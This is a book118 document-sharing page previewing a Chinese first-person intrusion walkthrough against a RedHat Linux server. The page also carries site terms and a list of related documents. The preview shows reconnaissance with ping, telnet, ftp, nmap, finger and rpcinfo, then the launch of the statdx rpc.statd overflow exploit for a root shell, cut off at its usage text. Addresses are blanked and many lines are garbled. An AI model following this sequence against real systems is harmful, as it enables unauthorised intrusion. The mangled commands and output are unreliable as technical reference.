- 1、本文档共3页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
一次曲折的RedHatLinux操作系统入侵.doc
一次曲折的RedHat Linux操作系统入侵~教育资源库
首先确定目标,假设是:.XXX.
先让俺看看是不是连得上:
C:ping .XXX.
Pinging .XXX.[00] 00: bytes=32 time=541ms TTL=244
Reply from 00: bytes=32 time=620ms TTL=244
Reply from 00: bytes=32 time=651ms TTL=244
Reply from 00: bytes=32 time=511ms TTL=244
Ping statistics for 00:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 511ms, Maximum = 651ms, Average = 580ms
嘻嘻不但连得上,速度还不错
先tel看看banner:
C:gt;tel .XXX.
遗失对主机的连接。
再试试ftp,
C:gt;ftp .XXX.
Connected to ..tp on an i686
login: fetdog
Passap扫描器,看看其中的奥妙~~~
bash-2.04$nmap -sT -O .XXX.
Starting nmap V. 2.54BETA7 ( ./nmap/ )
APDIR=. to give priority to files in
irectory
Interesting ports on (.XXX.):
(The 1520 ports scanned but not shotp
79/tcp open finger
80/tcp open http
111/tcp open sunrpc
113/tcp open auth
443/tcp open https
513/tcp open login
514/tcp open shell
515/tcp open printer
587/tcp open submission
1024/tcp open kdm
TCP Sequence Prediction: Class=random positive increments
Difficulty=3247917 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.16
Nmap run pleted -- 1 IP address (1 host up) scanned in 9 seconds
打开的端口还挺多,这意味着入侵的可能性增加。79/tcp open finger ,先看看这个,不过linux没有finger用户列表这个漏洞。
bash-2.04$finger .XXX.
[.XXX.]
No one logged on.
再看看111/tcp open sunrpc 。近来rpc漏洞风行,不知道RH7这个东东会不会有?先看看再说!
bash-2.04$rpcinfo -p .XXX.
program vers proto port service
100000 2 tcp 111 rpcbind
100000 2 udp 111 rpcbind
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100024 1 udp 1025 status
100024 1 tcp 1024 status
看来有rpc.statd服务。来看看能不能远程溢出拿个rootshell。
bash-2.04$./statdx -h
statd
123下一页 友情提醒:,特别!x by ron1n
Usage: stat [-t] [-p port] [-a addr] [-l len]
[-o offset] [-] [-s secs] [-d type]
-t attack a tcp dispatcher [udp]
-p rpc.statd serves requests on [query]
-a the stack address of the buffer is
-l the le
您可能关注的文档
- FGF23过表达对小鼠肾、肝和海马中SOD、GSHPX活力和MDA含量的影响.doc
- FreeBSD可执行程序格式.doc
- FreeBSD手工编译安装程序.doc
- Ghrelin对MPTP小鼠帕金森病模型黑质TH、Bcl2和BaxmRNA表达的影响.doc
- GIS理念之城市绿地景观环保评估.doc
- GlcNAc糖基转移酶表达下调对tau蛋白磷酸化的影响.doc
- Global.asa文件的使用及Chat程序--.doc
- HBVX基因对成人肝细胞HL7702线粒体功能的影响.doc
- HCG日血清孕酮水平对体外受精胚胎移植结局的影响.doc
- HDAC6表达载体转染对胃癌细胞株SGC7901生物学行为的影响.doc
文档评论(0)